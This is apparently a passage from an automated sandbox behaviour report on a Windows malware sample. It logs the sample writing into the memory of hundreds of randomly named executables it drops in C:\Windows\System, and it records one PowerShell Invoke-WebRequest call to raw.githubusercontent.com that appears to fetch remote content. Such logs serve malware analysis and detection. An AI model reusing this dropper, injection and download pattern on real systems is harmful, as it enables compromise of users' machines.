PID 2212 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\ShhklzO.exe
PID 2212 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\ShhklzO.exe
PID 2212 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\XvdQebu.exe
PID 2212 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\XvdQebu.exe
PID 2212 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\XvdQebu.exe
PID 2212 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\Mhjgxzm.exe
PID 2212 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\Mhjgxzm.exe
PID 2212 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\Mhjgxzm.exe
PID 2212 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\bmvEBsT.exe
PID 2212 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\bmvEBsT.exe
PID 2212 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\bmvEBsT.exe
PID 2212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\UXyYTln.exe
PID 2212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\UXyYTln.exe
PID 2212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\UXyYTln.exe
PID 2212 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\ajKlAqP.exe
PID 2212 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\ajKlAqP.exe
PID 2212 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\ajKlAqP.exe
PID 2212 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\VCSHQqH.exe
PID 2212 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\VCSHQqH.exe
PID 2212 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\VCSHQqH.exe
PID 2212 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\daGDcMk.exe
PID 2212 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\daGDcMk.exe
PID 2212 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\daGDcMk.exe
PID 2212 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\kwrCXhu.exe
PID 2212 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\kwrCXhu.exe
PID 2212 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\kwrCXhu.exe
PID 2212 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\cflYcvJ.exe
PID 2212 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\cflYcvJ.exe
PID 2212 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\cflYcvJ.exe
PID 2212 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\BTzOJlq.exe
PID 2212 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\BTzOJlq.exe
PID 2212 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\BTzOJlq.exe
PID 2212 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\JhEINBq.exe
PID 2212 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\JhEINBq.exe
PID 2212 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\JhEINBq.exe
PID 2212 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\DSUGdFM.exe
PID 2212 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\DSUGdFM.exe
PID 2212 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\DSUGdFM.exe
PID 2212 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\PgHCagB.exe
PID 2212 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\PgHCagB.exe
PID 2212 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\PgHCagB.exe
PID 2212 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\hbENexV.exe
PID 2212 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\hbENexV.exe
PID 2212 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\hbENexV.exe
PID 2212 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\dzxPdXY.exe
PID 2212 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\dzxPdXY.exe
PID 2212 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\dzxPdXY.exe
PID 2212 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\KSmpXXG.exe
PID 2212 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\KSmpXXG.exe
PID 2212 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\KSmpXXG.exe
PID 2212 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\omwhhut.exe
PID 2212 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\omwhhut.exe
PID 2212 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\omwhhut.exe
PID 2212 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\tHCaKut.exe
PID 2212 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\tHCaKut.exe
PID 2212 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\tHCaKut.exe
PID 2212 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\oNLzwTr.exe

Processes

C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\NlgCNPq.exe

C:\Windows\System\NlgCNPq.exe

C:\Windows\System\ShhklzO.exe

C:\Windows\System\ShhklzO.exe

C:\Windows\System\XvdQebu.exe

C:\Windows\System\XvdQebu.exe

C:\Windows\System\Mhjgxzm.exe

C:\Windows\System\Mhjgxzm.exe

C:\Windows\System\bmvEBsT.exe

C:\Windows\System\bmvEBsT.exe

C:\Windows\System\UXyYTln.exe

C:\Windows\System\UXyYTln.exe

C:\Windows\System\ajKlAqP.exe

C:\Windows\System\ajKlAqP.exe

C:\Windows\System\VCSHQqH.exe

C:\Windows\System\VCSHQqH.exe

C:\Windows\System\daGDcMk.exe

C:\Windows\System\daGDcMk.exe

C:\Windows\System\kwrCXhu.exe

C:\Windows\System\kwrCXhu.exe

C:\Windows\System\cflYcvJ.exe

C:\Windows\System\cflYcvJ.exe

C:\Windows\System\BTzOJlq.exe

C:\Windows\System\BTzOJlq.exe

C:\Windows\System\JhEINBq.exe

C:\Windows\System\JhEINBq.exe

C:\Windows\System\DSUGdFM.exe

C:\Windows\System\DSUGdFM.exe

C:\Windows\System\PgHCagB.exe

C:\Windows\System\PgHCagB.exe

C:\Windows\System\hbENexV.exe

C:\Windows\System\hbENexV.exe

C:\Windows\System\dzxPdXY.exe

C:\Windows\System\dzxPdXY.exe

C:\Windows\System\KSmpXXG.exe

C:\Windows\System\KSmpXXG.exe

C:\Windows\System\omwhhut.exe

C:\Windows\System\omwhhut.exe

C:\Windows\System\tHCaKut.exe

C:\Windows\System\tHCaKut.exe

C:\Windows\System\oNLzwTr.exe

C:\Windows\System\oNLzwTr.exe

C:\Windows\System\aytEyyB.exe

C:\Windows\System\aytEyyB.exe

C:\Windows\System\SoYVwkK.exe

C:\Windows\System\SoYVwkK.exe

C:\Windows\System\pbIuqss.exe

C:\Windows\System\pbIuqss.exe

C:\Windows\System\kpUBkjW.exe

C:\Windows\System\kpUBkjW.exe

C:\Windows\System\jwlejST.exe

C:\Windows\System\jwlejST.exe

C:\Windows\System\EUwRvBb.exe

C:\Windows\System\EUwRvBb.exe

C:\Windows\System\GPYydnB.exe

C:\Windows\System\GPYydnB.exe

C:\Windows\System\WZVmHOR.exe

C:\Windows\System\WZVmHOR.exe

C:\Windows\System\yCzRqRJ.exe

C:\Windows\System\yCzRqRJ.exe

C:\Windows\System\XjFLIzq.exe

C:\Windows\System\XjFLIzq.exe

C:\Windows\System\gralLCl.exe

C:\Windows\System\gralLCl.exe

C:\Windows\System\jVgGGJw.exe

C:\Windows\System\jVgGGJw.exe

C:\Windows\System\blTqtUH.exe

C:\Windows\System\blTqtUH.exe

C:\Windows\System\BVUxEct.exe

C:\Windows\System\BVUxEct.exe

C:\Windows\System\PgOetud.exe

C:\Windows\System\PgOetud.exe

C:\Windows\System\YKgWHYX.exe

C:\Windows\System\YKgWHYX.exe

C:\Windows\System\WYxMrhv.exe

C:\Windows\System\WYxMrhv.exe

C:\Windows\System\TizSLFU.exe

C:\Windows\System\TizSLFU.exe

C:\Windows\System\pxnJtCg.exe

C:\Windows\System\pxnJtCg.exe

C:\Windows\System\NChKRKs.exe

C:\Windows\System\NChKRKs.exe

C:\Windows\System\AMXTKmC.exe

C:\Windows\System\AMXTKmC.exe

C:\Windows\System\YVBYTTJ.exe

C:\Windows\System\YVBYTTJ.exe

C:\Windows\System\snQQFOC.exe

C:\Windows\System\snQQFOC.exe

C:\Windows\System\SLoByxK.exe

C:\Windows\System\SLoByxK.exe

C:\Windows\System\nmWWNlF.exe

C:\Windows\System\nmWWNlF.exe

C:\Windows\System\NpgjExS.exe

C:\Windows\System\NpgjExS.exe

C:\Windows\System\zZmrtxU.exe

C:\Windows\System\zZmrtxU.exe

C:\Windows\System\vaiSBIY.exe

C:\Windows\System\vaiSBIY.exe

C:\Windows\System\vZKyuwS.exe

C:\Windows\System\vZKyuwS.exe

C:\Windows\System\czGedRw.exe

C:\Windows\System\czGedRw.exe

C:\Windows\System\niudbtf.exe

C:\Windows\System\niudbtf.exe

C:\Windows\System\NAxqhFt.exe

C:\Windows\System\NAxqhFt.exe

C:\Windows\System\lncnuNa.exe

C:\Windows\System\lncnuNa.exe

C:\Windows\System\EgmXNJl.exe

C:\Windows\System\EgmXNJl.exe

C:\Windows\System\WYGbnUA.exe

C:\Windows\System\WYGbnUA.exe

C:\Windows\System\EdeXjwe.exe

C:\Windows\System\EdeXjwe.exe

C:\Windows\System\jDFqIQI.exe

C:\Windows\System\jDFqIQI.exe

C:\Windows\System\fpsccKE.exe

C:\Windows\System\fpsccKE.exe

C:\Windows\System\NQoGkix.exe

C:\Windows\System\NQoGkix.exe

C:\Windows\System\vFyGNuz.exe

C:\Windows\System\vFyGNuz.exe

C:\Windows\System\gEOXTSU.exe

C:\Windows\System\gEOXTSU.exe

C:\Windows\System\GIDvWCA.exe

C:\Windows\System\GIDvWCA.exe

C:\Windows\System\PoZPtIK.exe

C:\Windows\System\PoZPtIK.exe

C:\Windows\System\ooaMItD.exe

C:\Windows\System\ooaMItD.exe

C:\Windows\System\WLuzxiI.exe

C:\Windows\System\WLuzxiI.exe

C:\Windows\System\mgAdvAy.exe

C:\Windows\System\mgAdvAy.exe

C:\Windows\System\bfOnGnV.exe

C:\Windows\System\bfOnGnV.exe

C:\Windows\System\ePcixeJ.exe

C:\Windows\System\ePcixeJ.exe

C:\Windows\System\vjFDkyg.exe

C:\Windows\System\vjFDkyg.exe

C:\Windows\System\ngkUXRI.exe

C:\Windows\System\ngkUXRI.exe

C:\Windows\System\eUhoBGt.exe

C:\Windows\System\eUhoBGt.exe

C:\Windows\System\ivkHoDZ.exe

C:\Windows\System\ivkHoDZ.exe

C:\Windows\System\luIrrSa.exe

C:\Windows\System\luIrrSa.exe

C:\Windows\System\sMINWQX.exe

C:\Windows\System\sMINWQX.exe

C:\Windows\System\WjBWCTx.exe

C:\Windows\System\WjBWCTx.exe

C:\Windows\System\AeRIUiA.exe

C:\Windows\System\AeRIUiA.exe

C:\Windows\System\bbGyXBE.exe

C:\Windows\System\bbGyXBE.exe

C:\Windows\System\MwyhBVF.exe

C:\Windows\System\MwyhBVF.exe

C:\Windows\System\poFseLz.exe

C:\Windows\System\poFseLz.exe

C:\Windows\System\ovbEjoj.exe

C:\Windows\System\ovbEjoj.exe

C:\Windows\System\tnlHRIo.exe

C:\Windows\System\tnlHRIo.exe

C:\Windows\System\ImKrXsj.exe

C:\Windows\System\ImKrXsj.exe

C:\Windows\System\KgmvcGH.exe

C:\Windows\System\KgmvcGH.exe

C:\Windows\System\ObFnUvc.exe

C:\Windows\System\ObFnUvc.exe

C:\Windows\System\KnjyHiG.exe

C:\Windows\System\KnjyHiG.exe

C:\Windows\System\cLXMILp.exe

C:\Windows\System\cLXMILp.exe

C:\Windows\System\OLZOhPq.exe

C:\Windows\System\OLZOhPq.exe

C:\Windows\System\rIimAVe.exe

C:\Windows\System\rIimAVe.exe

C:\Windows\System\BFpYeHY.exe

C:\Windows\System\BFpYeHY.exe

C:\Windows\System\dlSToit.exe

C:\Windows\System\dlSToit.exe

C:\Windows\System\xPHhiMi.exe

C:\Windows\System\xPHhiMi.exe

C:\Windows\System\YEXGkZb.exe

C:\Windows\System\YEXGkZb.exe

C:\Windows\System\sWlxwoj.exe

C:\Windows\System\sWlxwoj.exe

C:\Windows\System\dRgVqTH.exe

C:\Windows\System\dRgVqTH.exe

C:\Windows\System\jRsmveh.exe

C:\Windows\System\jRsmveh.exe

C:\Windows\System\dZHENuz.exe

C:\Windows\System\dZHENuz.exe

C:\Windows\System\jCtamKz.exe

C:\Windows\System\jCtamKz.exe

C:\Windows\System\xgsrfZD.exe

C:\Windows\System\xgsrfZD.exe

C:\Windows\System\GTluGxN.exe

C:\Windows\System\GTluGxN.exe

C:\Windows\System\mgNzyMN.exe

C:\Windows\System\mgNzyMN.exe

C:\Windows\System\BqgQFMk.exe

C:\Windows\System\BqgQFMk.exe

C:\Windows\System\tarvZug.exe

C:\Windows\System\tarvZug.exe

C:\Windows\System\vtXHQSw.exe

C:\Windows\System\vtXHQSw.exe

C:\Windows\System\jWdEbNx.exe

C:\Windows\System\jWdEbNx.exe

C:\Windows\System\ISvbNZG.exe

C:\Windows\System\ISvbNZG.exe

C:\Windows\System\bgrrpNS.exe

C:\Windows\System\bgrrpNS.exe

C:\Windows\System\GXwBhUU.exe

C:\Windows\System\GXwBhUU.exe

C:\Windows\System\JbCSDBq.exe

C:\Windows\System\JbCSDBq.exe

C:\Windows\System\Vapdtqg.exe

C:\Windows\System\Vapdtqg.exe

C:\Windows\System\FqkqLRK.exe

C:\Windows\System\FqkqLRK.exe

C:\Windows\System\yGCQwwq.exe

C:\Windows\System\yGCQwwq.exe

C:\Windows\System\WAMasvM.exe

C:\Windows\System\WAMasvM.exe

C:\Windows\System\PrqJBda.exe

C:\Windows\System\PrqJBda.exe

C:\Windows\System\JCVhImY.exe

C:\Windows\System\JCVhImY.exe

C:\Windows\System\MoCFNzK.exe

C:\Windows\System\MoCFNzK.exe

C:\Windows\System\VHOAdDC.exe

C:\Windows\System\VHOAdDC.exe

C:\Windows\System\ZafBYup.exe

C:\Windows\System\ZafBYup.exe

C:\Windows\System\IHrYPwn.exe

C:\Windows\System\IHrYPwn.exe

C:\Windows\System\PaQsAnc.exe

C:\Windows\System\PaQsAnc.exe

C:\Windows\System\MnTpGCC.exe

C:\Windows\System\MnTpGCC.exe

C:\Windows\System\jsQHjyh.exe

C:\Windows\System\jsQHjyh.exe

C:\Windows\System\WmVolAe.exe

C:\Windows\System\WmVolAe.exe

C:\Windows\System\lTkbITJ.exe

C:\Windows\System\lTkbITJ.exe

C:\Windows\System\WTKCjFf.exe

C:\Windows\System\WTKCjFf.exe

C:\Windows\System\PfKdHSC.exe

C:\Windows\System\PfKdHSC.exe

C:\Windows\System\vTqNlQz.exe

C:\Windows\System\vTqNlQz.exe

C:\Windows\System\ECCLRxW.exe

C:\Windows\System\ECCLRxW.exe

C:\Windows\System\RKFOokG.exe

C:\Windows\System\RKFOokG.exe

C:\Windows\System\PWVPfEi.exe

C:\Windows\System\PWVPfEi.exe

C:\Windows\System\zVNvcET.exe

C:\Windows\System\zVNvcET.exe

C:\Windows\System\IPOLnYq.exe

C:\Windows\System\IPOLnYq.exe

C:\Windows\System\bFoBQDG.exe

C:\Windows\System\bFoBQDG.exe

C:\Windows\System\GJpKLAO.exe

C:\Windows\System\GJpKLAO.exe

C:\Windows\System\GPfrkSk.exe

C:\Windows\System\GPfrkSk.exe

C:\Windows\System\siuCGxY.exe

C:\Windows\System\siuCGxY.exe

C:\Windows\System\BzmPSFV.exe

C:\Windows\System\BzmPSFV.exe

C:\Windows\System\ndcKuWi.exe

C:\Windows\System\ndcKuWi.exe

C:\Windows\System\SbCXTvA.exe

C:\Windows\System\SbCXTvA.exe

C:\Windows\System\xrfJBVq.exe

C:\Windows\System\xrfJBVq.exe

C:\Windows\System\hgQODZa.exe

C:\Windows\System\hgQODZa.exe

C:\Windows\System\TqISKFW.exe

C:\Windows\System\TqISKFW.exe

C:\Windows\System\UjWsJwO.exe

C:\Windows\System\UjWsJwO.exe

C:\Windows\System\eGgEMwx.exe

C:\Windows\System\eGgEMwx.exe

C:\Windows\System\yzRhGhP.exe

C:\Windows\System\yzRhGhP.exe

C:\Windows\System\FHOzpZa.exe

C:\Windows\System\FHOzpZa.exe

C:\Windows\System\acXHzUC.exe

C:\Windows\System\acXHzUC.exe

C:\Windows\System\rAnnDTU.exe

C:\Windows\System\rAnnDTU.exe

C:\Windows\System\MBVhMdY.exe

C:\Windows\System\MBVhMdY.exe

C:\Windows\System\FEykpKG.exe

C:\Windows\System\FEykpKG.exe

C:\Windows\System\pppHtfD.exe

C:\Windows\System\pppHtfD.exe

C:\Windows\System\DfgEINp.exe

C:\Windows\System\DfgEINp.exe

C:\Windows\System\kKARezI.exe

C:\Windows\System\kKARezI.exe

C:\Windows\System\fHjrUyt.exe

C:\Windows\System\fHjrUyt.exe

C:\Windows\System\WWaSblH.exe

C:\Windows\System\WWaSblH.exe

C:\Windows\System\icJktBC.exe

C:\Windows\System\icJktBC.exe

C:\Windows\System\EsrXZcB.exe

C:\Windows\System\EsrXZcB.exe

C:\Windows\System\hADmoIn.exe

C:\Windows\System\hADmoIn.exe

C:\Windows\System\huzmKfm.exe

C:\Windows\System\huzmKfm.exe

C:\Windows\System\LPvNjsS.exe

C:\Windows\System\LPvNjsS.exe

C:\Windows\System\WEOBZvD.exe

C:\Windows\System\WEOBZvD.exe

C:\Windows\System\JHRDGfr.exe

C:\Windows\System\JHRDGfr.exe

C:\Windows\System\KPvOqVh.exe

C:\Windows\System\KPvOqVh.exe

C:\Windows\System\joBNgsD.exe

C:\Windows\System\joBNgsD.exe

C:\Windows\System\hePJFCu.exe

C:\Windows\System\hePJFCu.exe

C:\Windows\System\aqMqAYY.exe

C:\Windows\System\aqMqAYY.exe

C:\Windows\System\fogzsWa.exe

C:\Windows\System\fogzsWa.exe

C:\Windows\System\WlBWvUI.exe

C:\Windows\System\WlBWvUI.exe

C:\Windows\System\lZeprAo.exe

C:\Windows\System\lZeprAo.exe

C:\Windows\System\lduoQOC.exe

C:\Windows\System\lduoQOC.exe

C:\Windows\System\WOgNFaQ.exe

C:\Windows\System\WOgNFaQ.exe

C:\Windows\System\fuASuWI.exe

C:\Windows\System\fuASuWI.exe

C:\Windows\System\aXqtjki.exe

C:\Windows\System\aXqtjki.exe

C:\Windows\System\GEJTbnh.exe

C:\Windows\System\GEJTbnh.exe

C:\Windows\System\tqEVsqh.exe

C:\Windows\System\tqEVsqh.exe

C:\Windows\System\ibkzPGg.exe

C:\Windows\System\ibkzPGg.exe

C:\Windows\System\ElurgSC.exe

C:\Windows\System\ElurgSC.exe

C:\Windows\System\XzMlTdn.exe

C:\Windows\System\XzMlTdn.exe

C:\Windows\System\PlPKuaI.exe

C:\Windows\System\PlPKuaI.exe

C:\Windows\System\kRzpBbU.exe

C:\Windows\System\kRzpBbU.exe

C:\Windows\System\GCGhZLz.exe

C:\Windows\System\GCGhZLz.exe

C:\Windows\System\MMZCSMa.exe

C:\Windows\System\MMZCSMa.exe

C:\Windows\System\XQvwfIc.exe

C:\Windows\System\XQvwfIc.exe

C:\Windows\System\uJcyUYo.exe

C:\Windows\System\uJcyUYo.exe

C:\Windows\System\HVjmKYj.exe

C:\Windows\System\HVjmKYj.exe

C:\Windows\System\NaNhgza.exe

C:\Windows\System\NaNhgza.exe

C:\Windows\System\ecsuMZp.exe

C:\Windows\System\ecsuMZp.exe

C:\Windows\System\cwgsZdY.exe

C:\Windows\System\cwgsZdY.exe

C:\Windows\System\WxTRtib.exe

C:\Windows\System\WxTRtib.exe

C:\Windows\System\asZfpeJ.exe

C:\Windows\System\asZfpeJ.exe

C:\Windows\System\DVpWhzb.exe

C:\Windows\System\DVpWhzb.exe

C:\Windows\System\mdEQVAP.exe

C:\Windows\System\mdEQVAP.exe

C:\Windows\System\arhPhQw.exe

C:\Windows\System\arhPhQw.exe

C:\Windows\System\Jhixlks.exe

C:\Windows\System\Jhixlks.exe

C:\Windows\System\MPFMMPj.exe

C:\Windows\System\MPFMMPj.exe

C:\Windows\System\JeJxKRh.exe

C:\Windows\System\JeJxKRh.exe

C:\Windows\System\IXOuSiQ.exe

C:\Windows\System\IXOuSiQ.exe

C:\Windows\System\zzFRvyW.exe

C:\Windows\System\zzFRvyW.exe

C:\Windows\System\ttaJqXV.exe

C:\Windows\System\ttaJqXV.exe

C:\Windows\System\gkmaGHC.exe

C:\Windows\System\gkmaGHC.exe

C:\Windows\System\MhcLUhb.exe

C:\Windows\System\MhcLUhb.exe

C:\Windows\System\KcNWsta.exe

C:\Windows\System\KcNWsta.exe

C:\Windows\System\EmJzzKy.exe

C:\Windows\System\EmJzzKy.exe

C:\Windows\System\QYOfUvC.exe

C:\Windows\System\QYOfUvC.exe

C:\Windows\System\WfxKAgU.exe

C:\Windows\System\WfxKAgU.exe

C:\Windows\System\FoaOKye.exe

C:\Windows\System\FoaOKye.exe

C:\Windows\System\vcOSGfm.exe

C:\Windows\System\vcOSGfm.exe

C:\Windows\System\VcVyXvm.exe

C:\Windows\System\VcVyXvm.exe

C:\Windows\System\gxLNebO.exe

C:\Windows\System\gxLNebO.exe

C:\Windows\System\mxcAsok.exe

C:\Windows\System\mxcAsok.exe

C:\Windows\System\FGCtHos.exe

C:\Windows\System\FGCtHos.exe

C:\Windows\System\fiHznlb.exe

C:\Windows\System\fiHznlb.exe

C:\Windows\System\EtMAPKZ.exe

C:\Windows\System\EtMAPKZ.exe

C:\Windows\System\TztVQik.exe

C:\Windows\System\TztVQik.exe

C:\Windows\System\yNsFPPX.exe

C:\Windows\System\yNsFPPX.exe

C:\Windows\System\iAMvKdL.exe

C:\Windows\System\iAMvKdL.exe

C:\Windows\System\ZvvJsRh.exe

C:\Windows\System\ZvvJsRh.exe

C:\Windows\System\vZHUVxu.exe

C:\Windows\System\vZHUVxu.exe

C:\Windows\System\JkUCmDW.exe

C:\Windows\System\JkUCmDW.exe

C:\Windows\System\WpXuZvg.exe

C:\Windows\System\WpXuZvg.exe

C:\Windows\System\txOissT.exe

C:\Windows\System\txOissT.exe

C:\Windows\System\aQNhMwa.exe

C:\Windows\System\aQNhMwa.exe

C:\Windows\System\tlWsSMo.exe

C:\Windows\System\tlWsSMo.exe

C:\Windows\System\HLVheJT.exe

C:\Windows\System\HLVheJT.exe

C:\Windows\System\uqteDVR.exe

C:\Windows\System\uqteDVR.exe

C:\Windows\System\AtTZdzM.exe

C:\Windows\System\AtTZdzM.exe

C:\Windows\System\JPfrrnI.exe

C:\Windows\System\JPfrrnI.exe

C:\Windows\System\wwcYLgM.exe

C:\Windows\System\wwcYLgM.exe

C:\Windows\System\ZQIAbHc.exe

C:\Windows\System\ZQIAbHc.exe

C:\Windows\System\XoXFslN.exe

C:\Windows\System\XoXFslN.exe

C:\Windows\System\vZZrRsj.exe

C:\Windows\System\vZZrRsj.exe

C:\Windows\System\GDZSIxJ.exe

C:\Windows\System\GDZSIxJ.exe

C:\Windows\System\tWafgYF.exe

